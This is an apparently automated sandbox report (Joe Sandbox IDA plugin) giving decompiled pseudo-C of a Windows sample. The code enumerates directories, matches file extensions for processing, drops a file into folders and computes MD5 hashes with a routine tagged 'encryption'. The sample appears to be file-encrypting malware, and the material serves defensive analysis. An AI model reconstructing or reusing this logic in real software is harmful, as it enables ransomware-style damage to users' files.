				void* _t357;
				void* _t374;
				signed int _t380;
				WCHAR* _t381;
				WCHAR* _t392;
				WCHAR* _t394;
				void* _t451;
				void* _t457;
				signed int _t458;
				signed int _t460;
				WCHAR* _t461;
				intOrPtr _t462;
				intOrPtr _t463;
				void* _t464;
				intOrPtr* _t467;
				signed int _t469;
				intOrPtr* _t472;
				signed int _t474;
				char* _t481;
				char* _t482;
				intOrPtr* _t484;
				signed int _t486;
				intOrPtr* _t488;
				short* _t494;
				signed int _t497;
				signed int _t500;
				WCHAR* _t501;
				short* _t502;
				signed int _t507;
				intOrPtr* _t515;
				void* _t517;
				void* _t518;
				void* _t519;
				intOrPtr _t523;
				intOrPtr _t524;
				signed int _t525;
				signed int _t528;
				WCHAR* _t529;
				intOrPtr _t531;
				void* _t537;
				signed int* _t538;
				void* _t540;
				intOrPtr* _t541;
				intOrPtr* _t542;
				WCHAR* _t543;
				short _t544;
				intOrPtr _t545;
				void* _t546;
				void* _t547;
				short* _t549;
				void* _t550;
				short* _t551;

				_push(0xffffffff);
				_push(0x4cab09);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t545;
				_t546 = _t545 - 0x30c;
				_t456 = __edx;
				_v56 = __ecx;
				_v24 = __edx;
				_v8 = 0;
				E00411AB0();
				_t528 = 0;
				_t537 = (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2);
				_v52 = _t537;
				if(_t537 == 0) {
					L15:
					_v108 = 7;
					_v112 = 0;
					_v128 = 0;
					_v8 = 3;
					_push(0xffffffff);
					_v64 = 0;
					_v80 = 0;
					_v60 = 7;
					E00414690(_t456,  &_v80,  &_a4, 0);
					_v8 = 4;
					_t457 = PathFindFileNameW;
					_t302 =  >=  ? _v80 :  &_v80;
					_t515 = PathFindFileNameW( >=  ? _v80 :  &_v80);
					_v132 = 7;
					_v136 = 0;
					_v152 = 0;
					if( *_t515 != 0) {
						_t467 = _t515;
						_t77 = _t467 + 2; // 0x2
						_t537 = _t77;
						do {
							_t305 =  *_t467;
							_t467 = _t467 + 2;
						} while (_t305 != 0);
						_t469 = _t467 - _t537 >> 1;
						goto L24;
					} else {
						_t469 = 0;
						L24:
						_push(_t469);
						E00415C10(_t457,  &_v152, _t528, _t537, _t515);
						_v8 = 5;
						_t538 = E00413520( &_v80,  &_v48, 0, _v64 - _v136);
						if( &_v80 != _t538) {
							if(_v60 >= 8) {
								L00422587(_v80);
								_t546 = _t546 + 4;
							}
							_v60 = 7;
							_v64 = 0;
							_v80 = 0;
							if(_t538[5] >= 8) {
								_v80 =  *_t538;
								 *_t538 = 0;
							} else {
								_t430 = _t538[4] + 1;
								if(_t538[4] + 1 != 0) {
									E004205A0( &_v80, _t538, _t430 + _t430);
									_t546 = _t546 + 0xc;
								}
							}
							_v64 = _t538[4];
							_v60 = _t538[5];
							_t538[5] = 7;
							_t538[4] = 0;
							 *_t538 = 0;
						}
						if(_v28 >= 8) {
							L00422587(_v48);
							_t546 = _t546 + 4;
						}
						_t529 = 0;
						while(_v64 != 0 || _v136 != 0) {
							_t529 =  &(_t529[0]);
							_t313 =  >=  ? _v80 :  &_v80;
							_t515 = PathFindFileNameW( >=  ? _v80 :  &_v80);
							if( *_t515 != 0) {
								_t472 = _t515;
								_t107 = _t472 + 2; // 0x2
								_t538 = _t107;
								do {
									_t315 =  *_t472;
									_t472 = _t472 + 2;
								} while (_t315 != 0);
								_t474 = _t472 - _t538 >> 1;
								L42:
								_push(_t474);
								E00415C10(_t457,  &_v152, _t529, _t538, _t515);
								_t538 = E00413520( &_v80,  &_v48, 0, _v64 - _v136);
								if( &_v80 != _t538) {
									if(_v60 >= 8) {
										L00422587(_v80);
										_t546 = _t546 + 4;
									}
									_v60 = 7;
									_v64 = 0;
									_v80 = 0;
									if(_t538[5] >= 8) {
										_v80 =  *_t538;
										 *_t538 = 0;
									} else {
										_t418 = _t538[4] + 1;
										if(_t538[4] + 1 != 0) {
											E004205A0( &_v80, _t538, _t418 + _t418);
											_t546 = _t546 + 0xc;
										}
									}
									_v64 = _t538[4];
									_v60 = _t538[5];
									_t538[5] = 7;
									_t538[4] = 0;
									 *_t538 = 0;
								}
								if(_v28 >= 8) {
									L00422587(_v48);
									_t546 = _t546 + 4;
								}
								continue;
							}
							_t474 = 0;
							goto L42;
						}
						if(_t529 > 3) {
							L73:
							_t322 = E00417140( &_v104,  &_a4, "*");
							_t547 = _t546 + 4;
							if(_t322[0xa] >= 8) {
								_t322 =  *_t322;
							}
							_t323 = FindFirstFileW(_t322,  &_v796);
							_v52 = _t323;
							if(_v84 >= 8) {
								L00422587(_v104);
								_t323 = _v52;
								_t547 = _t547 + 4;
							}
							_v84 = 7;
							_t458 = 0;
							_v88 = 0;
							_v104 = 0;
							_v24 = 0;
							if(_t323 == 0xffffffff) {
								L139:
								if(_v132 >= 8) {
									L00422587(_v152);
									_t547 = _t547 + 4;
								}
								_v132 = 7;
								_v136 = 0;
								_v152 = 0;
								if(_v60 >= 8) {
									L00422587(_v80);
									_t547 = _t547 + 4;
								}
								_v60 = 7;
								_v64 = 0;
								_v80 = 0;
								if(_v108 >= 8) {
									L00422587(_v128);
									_t547 = _t547 + 4;
								}
								_t326 = 0;
								_v108 = 7;
								_v112 = 0;
								_v128 = 0;
								goto L146;
							} else {
								_t540 = _v52;
								do {
									_t481 = ".";
									_t330 =  &(_v796.cFileName);
									while(1) {
										_t517 =  *_t330;
										if(_t517 !=  *_t481) {
											break;
										}
										if(_t517 == 0) {
											L84:
											_t331 = 0;
											L86:
											if(_t331 == 0) {
												goto L137;
											}
											_t482 = L"..";
											_t335 =  &(_v796.cFileName);
											while(1) {
												_t518 =  *_t335;
												if(_t518 !=  *_t482) {
													break;
												}
												if(_t518 == 0) {
													L92:
													_t336 = 0;
													L94:
													if(_t336 == 0) {
														goto L137;
													}
													if((_v796.dwFileAttributes & 0x00000010) == 0) {
														_t460 = _t458 + 1;
														_v24 = _t460;
														if(_t460 >= 0x400) {
															_v24 = 0;
															E00411AB0();
														}
														if(_a32 == 0) {
															goto L137;
														} else {
															_v28 = 7;
															_push(0xffffffff);
															_v48 = 0;
															_v32 = 0;
															E00414690(_t460,  &_v48,  &_a4, 0);
															_v8 = 9;
															if(_v796.cFileName != 0) {
																_t484 =  &(_v796.cFileName);
																_t241 = _t484 + 2; // 0x2
																_t519 = _t241;
																do {
																	_t340 =  *_t484;
																	_t484 = _t484 + 2;
																} while (_t340 != 0);
																_t486 = _t484 - _t519 >> 1;
																L108:
																_push(_t486);
																_t487 =  &_v48;
																E00415AE0(_t460,  &_v48, _t529, _t540,  &(_v796.cFileName));
																_t344 =  >=  ? _v48 :  &_v48;
																_t461 = PathFindExtensionW( >=  ? _v48 :  &_v48);
																_v17 = 0;
																_t346 = _v56;
																_t541 =  *((intOrPtr*)(_t346 + 0x88c));
																_t531 =  *((intOrPtr*)(_t346 + 0x890));
																if(_t541 == _t531) {
																	L118:
																	_t542 =  *((intOrPtr*)(_t346 + 0x898));
																	_t529 =  *(_t346 + 0x89c);
																	if(_t542 == _t529) {
																		L126:
																		if(_v17 == 0) {
																			_t348 = _t346 + 0x868;
																			if( *((intOrPtr*)(_t348 + 0x14)) >= 8) {
																				_t348 =  *_t348;
																			}
																			_push(_t461);
																			_push(_t348);
																			_t349 = E00421C02(_t487);
																			_t547 = _t547 + 8;
																			if(_t349 == 0) {
																				_t462 = _v56;
																				_t488 = _t462 + 0x820;
																				if( *((intOrPtr*)(_t462 + 0x834)) >= 8) {
																					_t488 =  *_t488;
																				}
																				_push(_t488);
																				_t351 =  >=  ? _v48 :  &_v48;
																				_push( >=  ? _v48 :  &_v48);
																				_t352 = E00421C02(_t488);
																				_t547 = _t547 + 8;
																				if(_t352 == 0) {
																					_t521 =  >=  ? _v48 :  &_v48;
																					E004111C0(_t462,  >=  ? _v48 :  &_v48);
																				}
																			}
																		}
																		L134:
																		_v8 = 5;
																		if(_v28 >= 8) {
																			L00422587(_v48);
																			_t547 = _t547 + 4;
																		}
																		_t540 = _v52;
																		goto L137;
																	}
																	L120:
																	L120:
																	if( *((intOrPtr*)(_t542 + 0x14)) < 8) {
																		_t354 = _t542;
																	} else {
																		_t354 =  *_t542;
																	}
																	_t487 =  &(_v796.cFileName);
																	_push( &(_v796.cFileName));
																	_push(_t354);
																	_t355 = E00421C02( &(_v796.cFileName));
																	_t547 = _t547 + 8;
																	if(_t355 != 0) {
																		goto L134;
																	}
																	_t542 = _t542 + 0x18;
																	if(_t542 != _t529) {
																		goto L120;
																	}
																	_t346 = _v56;
																	goto L126;
																}
																L110:
																L110:
																if( *((intOrPtr*)(_t541 + 0x14)) < 8) {
																	_t356 = _t541;
																} else {
																	_t356 =  *_t541;
																}
																_push(_t461);
																_push(_t356);
																_t357 = E00421C02(_t487);
																_t547 = _t547 + 8;
																if(_t357 != 0) {
																	goto L116;
																}
																_t541 = _t541 + 0x18;
																if(_t541 != _t531) {
																	goto L110;
																}
																L117:
																_t346 = _v56;
																goto L118;
																L116:
																_v17 = 1;
																goto L117;
															}
															_t486 = 0;
															goto L108;
														}
													}
													E00417140( &_v204,  &_a4,  &(_v796.cFileName));
													_t547 = _t547 + 4;
													_push(1);
													_v8 = 7;
													E00415AE0(_t458,  &_v204, _t529, _t540, "\\");
													_v160 = 7;
													_v164 = 0;
													_v180 = 0;
													_push(0xffffffff);
													_v8 = 8;
													E00414690(_t458,  &_v180,  &_v204, 0);
													_v156 = 0;
													E00413B70(_a28,  &_v180);
													if(_v160 >= 8) {
														L00422587(_v180);
														_t547 = _t547 + 4;
													}
													_v8 = 5;
													_v160 = 7;
													_v164 = 0;
													_v180 = 0;
													if(_v184 >= 8) {
														L00422587(_v204);
														_t547 = _t547 + 4;
													}
													goto L137;
												}
												_t523 =  *((intOrPtr*)(_t335 + 2));
												_t204 =  &(_t482[2]); // 0x2e
												if(_t523 !=  *_t204) {
													break;
												}
												_t335 = _t335 + 4;
												_t482 =  &(_t482[4]);
												if(_t523 != 0) {
													continue;
												}
												goto L92;
											}
											asm("sbb eax, eax");
											_t336 = _t335 | 0x00000001;
											goto L94;
										}
										_t524 =  *((intOrPtr*)(_t330 + 2));
										_t201 =  &(_t481[2]); // 0x2e0000
										if(_t524 !=  *_t201) {
											break;
										}
										_t330 = _t330 + 4;
										_t481 =  &(_t481[4]);
										if(_t524 != 0) {
											continue;
										}
										goto L84;
									}
									asm("sbb eax, eax");
									_t331 = _t330 | 0x00000001;
									goto L86;
									L137:
									_t333 = FindNextFileW(_t540,  &_v796);
									_t458 = _v24;
								} while (_t333 != 0);
								FindClose(_t540);
								goto L139;
							}
						}
						_t549 = _t546 - 0x18;
						_t494 = _t549;
						_push(0xffffffff);
						 *(_t494 + 0x14) = 7;
						 *(_t494 + 0x10) = 0;
						 *_t494 = 0;
						E00414690(_t457, _t494,  &_a4, 0);
						_t374 = E0040F310(_t529, _t538);
						_t546 = _t549 + 0x18;
						if(_t374 != 0) {
							goto L73;
						}
						_push(0xffffffff);
						E00414690(_t457,  &_v128,  &_a4, 0);
						E00413A90(_t457,  &_v92, _t529, _v112 + 0x400);
						_v8 = 6;
						_t497 = 0;
						_t380 = _v112;
						_t543 = _v92;
						if(_t380 == 0) {
							L57:
							_t463 = _v56;
							 *((short*)(_t543 + 2 + _t380 * 2)) = 0;
							_t381 = _t463 + 0x820;
							if(_t381[0xa] >= 8) {
								_t381 =  *_t381;
							}
							PathAppendW(_t543, _t381);
							_push(_v24);
							_v28 = 7;
							_v32 = 0;
							_v48 = 0;
							E00418400( &_v48, _t543, _v88);
							if(_v108 >= 8) {
								L00422587(_v128);
								_t546 = _t546 + 4;
							}
							_t500 = _v28;
							_v108 = 7;
							_v112 = 0;
							_v128 = 0;
							if(_t500 >= 8) {
								_v128 = _v48;
							} else {
								_t402 = _v32 + 1;
								if(_v32 + 1 != 0) {
									E004205A0( &_v128,  &_v48, _t402 + _t402);
									_t500 = _v28;
									_t546 = _t546 + 0xc;
								}
							}
							_v112 = _v32;
							_t389 =  >=  ? _v128 :  &_v128;
							_v108 = _t500;
							if(PathFileExistsW( >=  ? _v128 :  &_v128) == 0) {
								_t392 = E00420C62(_t463, _t515, _t529, 0x7d00);
								_t501 = _t463 + 0x838;
								_t550 = _t546 + 4;
								_t529 = _t392;
								if(_t501[0xa] >= 8) {
									_t501 =  *_t501;
								}
								lstrcpyW(_t529, _t501);
								_t394 = _t463 + 0x850;
								if( *((intOrPtr*)(_t463 + 0x864)) >= 8) {
									_t394 =  *_t394;
								}
								lstrcatW(_t529, _t394);
								_t551 = _t550 - 0x18;
								_t502 = _t551;
								_push(0xffffffff);
								 *(_t502 + 0x14) = 7;
								 *(_t502 + 0x10) = 0;
								 *_t502 = 0;
								E00414690(_t463, _t502,  &_v128, 0);
								E0040F0E0(_t529);
								E00420BED(_t529);
								_t546 = _t551 + 0x1c;
							}
							_v8 = 5;
							if(_t543 != 0) {
								L00422587(_t543);
								_t546 = _t546 + 4;
							}
							goto L73;
						}
						do {
							_t409 =  >=  ? _v128 :  &_v128;
							_t543[_t497] = ( >=  ? _v128 :  &_v128)[_t497];
							_t497 = _t497 + 1;
							_t380 = _v112;
						} while (_t497 < _t380);
						goto L57;
					}
				} else {
					_t464 = 0;
					do {
						_v28 = 7;
						_push(0xffffffff);
						_v48 = 0;
						_v32 = 0;
						E00414690(_t464,  &_v48,  &_a4, 0);
						_v8 = 1;
						_push(0xffffffff);
						_v104 = 0;
						_v84 = 7;
						_v88 = 0;
						E00414690(_t464,  &_v104,  *_v24 + _t464, 0);
						_v8 = 2;
						_t525 = _v32;
						if(_t525 <= 1) {
							L10:
							if(_v84 >= 8) {
								L00422587(_v104);
								_t546 = _t546 + 4;
							}
							_v84 = 7;
							_v8 = 0;
							_v88 = 0;
							_v104 = 0;
							if(_v28 >= 8) {
								L00422587(_v48);
								_t546 = _t546 + 4;
							}
							goto L14;
						}
						_t507 = _v88;
						if(_t507 <= 1) {
							goto L10;
						} else {
							_t446 =  >=  ? _v48 :  &_v48;
							if( *((short*)(( >=  ? _v48 :  &_v48) + _t525 * 2 - 2)) != 0x5c) {
								_push(1);
								E00415AE0(_t464,  &_v48, _t528, _t537, "\\");
								_t507 = _v88;
							}
							_t544 = _v104;
							_t448 =  >=  ? _t544 :  &_v104;
							if( *((short*)(( >=  ? _t544 :  &_v104) + _t507 * 2 - 2)) != 0x5c) {
								_push(1);
								E00415AE0(_t464,  &_v104, _t528, _t544, "\\");
								_t544 = _v104;
							}
							_t509 =  >=  ? _t544 :  &_v104;
							_t450 =  >=  ? _v48 :  &_v48;
							_t451 = E00420235(_t464, _t528, _t544,  >=  ? _v48 :  &_v48,  >=  ? _t544 :  &_v104);
							_t547 = _t546 + 8;
							if(_t451 == 0) {
								if(_v84 >= 8) {
									L00422587(_v104);
									_t547 = _t547 + 4;
								}
								_t326 = 0;
								_v84 = 7;
								_v88 = 0;
								_v104 = 0;
								if(_v28 >= 8) {
									_t326 = L00422587(_v48);
									_t547 = _t547 + 4;
								}
								L146:
								if(_a24 >= 8) {
									_t326 = L00422587(_a4);
								}
								 *[fs:0x0] = _v16;
								return _t326;
							} else {
								_t537 = _v52;
								goto L10;
							}
						}
						L14:
						_t528 = _t528 + 1;
						_t464 = _t464 + 0x18;
					} while (_t528 < _t537);
					goto L15;
				}
			}

0x0040f733
0x0040f735
0x0040f740
0x0040f741
0x0040f748
0x0040f750
0x0040f752
0x0040f756
0x0040f759
0x0040f760
0x0040f76f
0x0040f77e
0x0040f780
0x0040f783
0x0040f8b5
0x0040f8b7
0x0040f8be
0x0040f8c5
0x0040f8c9
0x0040f8d0
0x0040f8d3
0x0040f8d6
0x0040f8de
0x0040f8e5
0x0040f8ea
0x0040f8f5
0x0040f8fb
0x0040f902
0x0040f904
0x0040f90d
0x0040f917
0x0040f921
0x0040f966
0x0040f968
0x0040f968
0x0040f970
0x0040f970
0x0040f973
0x0040f976
0x0040f97d
0x00000000
0x0040f923
0x0040f923
0x0040f97f
0x0040f97f
0x0040f987
0x0040f98c
0x0040f9a8
0x0040f9af
0x0040f9b5
0x0040f9ba
0x0040f9bf
0x0040f9bf
0x0040f9c4
0x0040f9cb
0x0040f9d2
0x0040f9da
0x0040f9f6
0x0040f9f9
0x0040f9dc
0x0040f9df
0x0040f9e0
0x0040f9ea
0x0040f9ef
0x0040f9ef
0x0040f9e0
0x0040fa02
0x0040fa08
0x0040fa0d
0x0040fa14
0x0040fa1b
0x0040fa1b
0x0040fa22
0x0040fa27
0x0040fa2c
0x0040fa2c
0x0040fa2f
0x0040fa31
0x0040fa44
0x0040fa4c
0x0040fa53
0x0040fa59
0x0040fa5f
0x0040fa61
0x0040fa61
0x0040fa64
0x0040fa64
0x0040fa67
0x0040fa6a
0x0040fa71
0x0040fa73
0x0040fa73
0x0040fa7b
0x0040fa98
0x0040fa9f
0x0040faa5
0x0040faaa
0x0040faaf
0x0040faaf
0x0040fab4
0x0040fabb
0x0040fac2
0x0040faca
0x0040fae6
0x0040fae9
0x0040facc
0x0040facf
0x0040fad0
0x0040fada
0x0040fadf
0x0040fadf
0x0040fad0
0x0040faf2
0x0040faf8
0x0040fafd
0x0040fb04
0x0040fb0b
0x0040fb0b
0x0040fb12
0x0040fb1b
0x0040fb20
0x0040fb20
0x00000000
0x0040fb12
0x0040fa5b
0x00000000
0x0040fa5b
0x0040fb2b
0x0040fcf0
0x0040fcfb
0x0040fd00
0x0040fd07
0x0040fd09
0x0040fd09
0x0040fd13
0x0040fd1d
0x0040fd20
0x0040fd25
0x0040fd2a
0x0040fd2d
0x0040fd2d
0x0040fd32
0x0040fd39
0x0040fd3b
0x0040fd42
0x0040fd46
0x0040fd4c
0x00410072
0x00410076
0x0041007e
0x00410083
0x00410083
0x00410088
0x00410093
0x0041009d
0x004100a4
0x004100a9
0x004100ae
0x004100ae
0x004100b3
0x004100be
0x004100c5
0x004100c9
0x004100ce
0x004100d3
0x004100d3
0x004100d6
0x004100d8
0x004100df
0x004100e6
0x00000000
0x0040fd52
0x0040fd52
0x0040fd60
0x0040fd60
0x0040fd65
0x0040fd70
0x0040fd70
0x0040fd76
0x00000000
0x00000000
0x0040fd7b
0x0040fd92
0x0040fd92
0x0040fd9b
0x0040fd9d
0x00000000
0x00000000
0x0040fda3
0x0040fda8
0x0040fdb0
0x0040fdb0
0x0040fdb6
0x00000000
0x00000000
0x0040fdbb
0x0040fdd2
0x0040fdd2
0x0040fddb
0x0040fddd
0x00000000
0x00000000
0x0040fdea
0x0040fec2
0x0040fec3
0x0040fecc
0x0040fece
0x0040fed5
0x0040fed5
0x0040fede
0x00000000
0x0040fee4
0x0040fee6
0x0040feed
0x0040fef0
0x0040fefa
0x0040ff02
0x0040ff07
0x0040ff13
0x0040ff19
0x0040ff1f
0x0040ff1f
0x0040ff22
0x0040ff22
0x0040ff25
0x0040ff28
0x0040ff2f
0x0040ff31
0x0040ff31
0x0040ff39
0x0040ff3c
0x0040ff48
0x0040ff53
0x0040ff55
0x0040ff59
0x0040ff5c
0x0040ff62
0x0040ff6a
0x0040ff9a
0x0040ff9a
0x0040ffa0
0x0040ffa8
0x0040ffda
0x0040ffde
0x0040ffe0
0x0040ffe9
0x0040ffeb
0x0040ffeb
0x0040ffed
0x0040ffee
0x0040ffef
0x0040fff4
0x0040fff9
0x0040fffb
0x00410005
0x0041000b
0x0041000d
0x0041000d
0x00410016
0x00410017
0x0041001b
0x0041001c
0x00410021
0x00410026
0x00410031
0x00410035
0x00410035
0x00410026
0x0040fff9
0x0041003a
0x0041003a
0x00410042
0x00410047
0x0041004c
0x0041004c
0x0041004f
0x00000000
0x0041004f
0x00000000
0x0040ffb0
0x0040ffb4
0x0040ffba
0x0040ffb6
0x0040ffb6
0x0040ffb6
0x0040ffbc
0x0040ffc2
0x0040ffc3
0x0040ffc4
0x0040ffc9
0x0040ffce
0x00000000
0x00000000
0x0040ffd0
0x0040ffd5
0x00000000
0x00000000
0x0040ffd7
0x00000000
0x0040ffd7
0x00000000
0x0040ff70
0x0040ff74
0x0040ff7a
0x0040ff76
0x0040ff76
0x0040ff76
0x0040ff7c
0x0040ff7d
0x0040ff7e
0x0040ff83
0x0040ff88
0x00000000
0x00000000
0x0040ff8a
0x0040ff8f
0x00000000
0x00000000
0x0040ff97
0x0040ff97
0x00000000
0x0040ff93
0x0040ff93
0x00000000
0x0040ff93
0x0040ff15
0x00000000
0x0040ff15
0x0040fede
0x0040fe00
0x0040fe05
0x0040fe08
0x0040fe15
0x0040fe19
0x0040fe20
0x0040fe2a
0x0040fe34
0x0040fe3b
0x0040fe44
0x0040fe4f
0x0040fe5e
0x0040fe65
0x0040fe71
0x0040fe79
0x0040fe7e
0x0040fe7e
0x0040fe83
0x0040fe8e
0x0040fe98
0x0040fea2
0x0040fea9
0x0040feb5
0x0040feba
0x0040feba
0x00000000
0x0040fea9
0x0040fdbd
0x0040fdc1
0x0040fdc5
0x00000000
0x00000000
0x0040fdc7
0x0040fdca
0x0040fdd0
0x00000000
0x00000000
0x00000000
0x0040fdd0
0x0040fdd6
0x0040fdd8
0x00000000
0x0040fdd8
0x0040fd7d
0x0040fd81
0x0040fd85
0x00000000
0x00000000
0x0040fd87
0x0040fd8a
0x0040fd90
0x00000000
0x00000000
0x00000000
0x0040fd90
0x0040fd96
0x0040fd98
0x00000000
0x00410052
0x0041005a
0x00410060
0x00410063
0x0041006c
0x00000000
0x0041006c
0x0040fd4c
0x0040fb31
0x0040fb36
0x0040fb38
0x0040fb3a
0x0040fb41
0x0040fb49
0x0040fb50
0x0040fb55
0x0040fb5a
0x0040fb5f
0x00000000
0x00000000
0x0040fb65
0x0040fb70
0x0040fb81
0x0040fb86
0x0040fb8a
0x0040fb8c
0x0040fb8f
0x0040fb94
0x0040fbbb
0x0040fbbb
0x0040fbc0
0x0040fbc5
0x0040fbcf
0x0040fbd1
0x0040fbd1
0x0040fbd5
0x0040fbdb
0x0040fbe0
0x0040fbed
0x0040fbf5
0x0040fbf9
0x0040fc02
0x0040fc07
0x0040fc0c
0x0040fc0c
0x0040fc0f
0x0040fc14
0x0040fc1b
0x0040fc22
0x0040fc29
0x0040fc4c
0x0040fc2b
0x0040fc2e
0x0040fc2f
0x0040fc3c
0x0040fc41
0x0040fc44
0x0040fc44
0x0040fc2f
0x0040fc55
0x0040fc5b
0x0040fc60
0x0040fc6b
0x0040fc72
0x0040fc77
0x0040fc7d
0x0040fc84
0x0040fc86
0x0040fc88
0x0040fc88
0x0040fc8c
0x0040fc99
0x0040fc9f
0x0040fca1
0x0040fca1
0x0040fca5
0x0040fcab
0x0040fcb0
0x0040fcb2
0x0040fcb4
0x0040fcbb
0x0040fcc3
0x0040fcca
0x0040fcd1
0x0040fcd7
0x0040fcdc
0x0040fcdc
0x0040fcdf
0x0040fce5
0x0040fce8
0x0040fced
0x0040fced
0x00000000
0x0040fce5
0x0040fba0
0x0040fba7
0x0040fbaf
0x0040fbb3
0x0040fbb4
0x0040fbb7
0x00000000
0x0040fba0
0x0040f789
0x0040f789
0x0040f790
0x0040f792
0x0040f799
0x0040f79c
0x0040f7a6
0x0040f7ae
0x0040f7b3
0x0040f7bc
0x0040f7bf
0x0040f7ca
0x0040f7d2
0x0040f7d9
0x0040f7de
0x0040f7e2
0x0040f7e8
0x0040f870
0x0040f874
0x0040f879
0x0040f87e
0x0040f87e
0x0040f883
0x0040f88a
0x0040f891
0x0040f898
0x0040f89c
0x0040f8a1
0x0040f8a6
0x0040f8a6
0x00000000
0x0040f89c
0x0040f7ee
0x0040f7f4
0x00000000
0x0040f7f6
0x0040f7fd
0x0040f807
0x0040f809
0x0040f813
0x0040f818
0x0040f818
0x0040f821
0x0040f827
0x0040f830
0x0040f832
0x0040f83c
0x0040f844
0x0040f844
0x0040f850
0x0040f858
0x0040f85d
0x0040f862
0x0040f867
0x0040f92b
0x0040f930
0x0040f935
0x0040f935
0x0040f938
0x0040f93a
0x0040f945
0x0040f94c
0x0040f950
0x0040f959
0x0040f95e
0x0040f95e
0x004100ea
0x004100ee
0x004100f3
0x004100f8
0x00410100
0x0041010b
0x0040f86d
0x0040f86d
0x00000000
0x0040f86d
0x0040f867
0x0040f8a9
0x0040f8a9
0x0040f8aa
0x0040f8ad
0x00000000
0x0040f790

APIs

Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411ACA
Part of subcall function 00411AB0: DispatchMessageW.USER32 ref: 00411AE0
Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411AEE

PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
_memmove.LIBCMT ref: 0040F9EA
PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
_memmove.LIBCMT ref: 0040FADA

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Message$FileFindNamePathPeek_memmove$Dispatch
String ID:
API String ID: 273148273-0
Opcode ID: 04b4ee6034c2b6a5f3a5811f4bfa8d93575535e1257763705c8142b8cb411a01
Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
Opcode Fuzzy Hash: 04b4ee6034c2b6a5f3a5811f4bfa8d93575535e1257763705c8142b8cb411a01
Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E0040E870(void* __ecx, void* __eflags, char _a4, intOrPtr _a20, intOrPtr _a24) {
				int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				long* _v32;
				int _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				long** _t48;
				int* _t49;
				char _t51;
				char _t53;
				char _t59;
				intOrPtr _t67;
				void* _t82;
				void* _t83;
				intOrPtr* _t89;
				void* _t94;
				void* _t95;
				int _t96;
				void* _t98;
				intOrPtr* _t99;
				void* _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				void* _t105;

				 *[fs:0x0] = _t102;
				_t103 = _t102 - 0x38;
				_v20 = _t103;
				_t83 = __ecx;
				_v8 = 0;
				_v32 = 0;
				_v24 = 0;
				_v36 = 0;
				E004156D0(__ecx, __ecx, _t95, 0x4ffca4);
				_t48 =  &_v32;
				_v8 = 1;
				__imp__CryptAcquireContextW(_t48, 0, 0, 1, 0xf0000000, 0, _t95, _t98, _t82,  *[fs:0x0], 0x4ca9e8, 0xffffffff);
				if(_t48 == 0) {
					_v40 = _t48;
					E00430ECA( &_v40, 0x5085b8);
				}
				_t49 =  &_v24;
				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t49);
				if(_t49 == 0) {
					_v44 = _t49;
					E00430ECA( &_v44, 0x5085b8);
				}
				_t51 =  >=  ? _a4 :  &_a4;
				__imp__CryptHashData(_v24, _t51, _a20, 0);
				if(_t51 == 0) {
					_v48 = _t51;
					E00430ECA( &_v48, 0x5085b8);
				}
				_t99 = __imp__CryptGetHashParam;
				_v28 = 0;
				_t53 =  *_t99(_v24, 2, 0,  &_v28, 0);
				_t113 = _t53;
				if(_t53 == 0) {
					_v52 = _t53;
					E00430ECA( &_v52, 0x5085b8);
				}
				_t96 = E00420BE4(_t83, _t95, _t113, _v28 + 1);
				_v36 = _t96;
				E0042B420(_t96, 0, _v28 + 1);
				_t105 = _t103 + 0x10;
				_t59 =  *_t99(_v24, 2, _t96,  &_v28, 0);
				if(_t59 == 0) {
					_v56 = _t59;
					E00430ECA( &_v56, 0x5085b8);
				}
				_t100 = 0;
				while(_t100 < _v28) {
					E004204A6( &_v72, "%.2X",  *(_t100 + _t96) & 0x000000ff);
					_t105 = _t105 + 0xc;
					if(_v72 != 0) {
						_t89 =  &_v72;
						_t39 = _t89 + 1; // 0x1
						_t94 = _t39;
						do {
							_t67 =  *_t89;
							_t89 = _t89 + 1;
							__eflags = _t67;
						} while (_t67 != 0);
						_push(_t89 - _t94);
						E00413EA0(_t83, _t83, _t96, _t100,  &_v72);
						_t100 = _t100 + 1;
					} else {
						_push(0);
						E00413EA0(_t83, _t83, _t96, _t100,  &_v72);
						_t100 = _t100 + 1;
					}
					L20:
				}
				E00422110(_t96);
				__imp__CryptDestroyHash(_v24);
				CryptReleaseContext(_v32, 0);
				__eflags = _a24 - 0x10;
				if(_a24 >= 0x10) {
					L00422587(_a4);
				}
				 *[fs:0x0] = _v16;
				return 1;
				goto L20;
			}

0x0040e881
0x0040e888
0x0040e88e
0x0040e891
0x0040e895
0x0040e8a1
0x0040e8a8
0x0040e8af
0x0040e8b6
0x0040e8c6
0x0040e8c9
0x0040e8ce
0x0040e8d6
0x0040e8d8
0x0040e8e4
0x0040e8e4
0x0040e8e9
0x0040e8f9
0x0040e901
0x0040e903
0x0040e90f
0x0040e90f
0x0040e920
0x0040e928
0x0040e930
0x0040e932
0x0040e93e
0x0040e93e
0x0040e943
0x0040e956
0x0040e95d
0x0040e95f
0x0040e961
0x0040e963
0x0040e96f
0x0040e96f
0x0040e985
